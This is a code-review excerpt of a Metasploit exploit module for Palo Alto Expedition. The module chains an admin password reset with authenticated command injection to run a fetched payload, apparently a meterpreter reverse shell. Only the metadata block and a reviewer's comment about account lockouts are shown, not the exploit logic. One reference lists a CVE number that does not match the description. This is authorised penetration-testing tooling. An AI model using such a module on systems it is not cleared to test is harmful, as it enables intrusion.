modules/exploits/linux/http/paloalto_expedition_rce.rb

```diff
@@ -0,0 +1,279 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Palo Alto Expedition Remote Code Execution (CVE-2024-5910 and CVE-2024-9464)',
+        'Description' => %q{
+          Obtain remote code execution in Palo Alto Expedition version 1.2.91 and below.
+          The first vulnerability, CVE-2024-5910, allows to reset the password of the admin user, and the second vulnerability, CVE-2024-9464, is an authenticated OS command injection. In a default installation, commands will get executed in the context of www-data.
+          When credentials are provided, this module will only exploit the second vulnerability. If no credentials are provided, the module will first try to reset the admin password and then perform the OS command injection.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'Zach Hanley', # Discovery CVE-2024-9464 and PoC
+          'Enrique Castillo', # Discovery CVE-2024-9464
+          'Brian Hysell' # Discovery CVE-2024-5910
+        ],
+        'References' => [
+          [ 'URL', 'https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/'],
+          [ 'URL', 'https://security.paloaltonetworks.com/PAN-SA-2024-0010'],
+          [ 'URL', 'https://security.paloaltonetworks.com/CVE-2024-5910'],
+          [ 'CVE', '2024-5910'],
+          [ 'CVE', '2024-24809']
+        ],
+        'DisclosureDate' => '2024-10-09',
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => 'True',
+          'FETCH_FILENAME' => Rex::Text.rand_text_alpha(1..3),
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Linux Command',
+            {
+              'Arch' => [ ARCH_CMD ],
+              'Platform' => [ 'linux' ],
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
```

Comment:
```suggestion
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, ACCOUNT_LOCKOUTS]
```

As the admin password is reset.

Reply:
Good catch, thank you.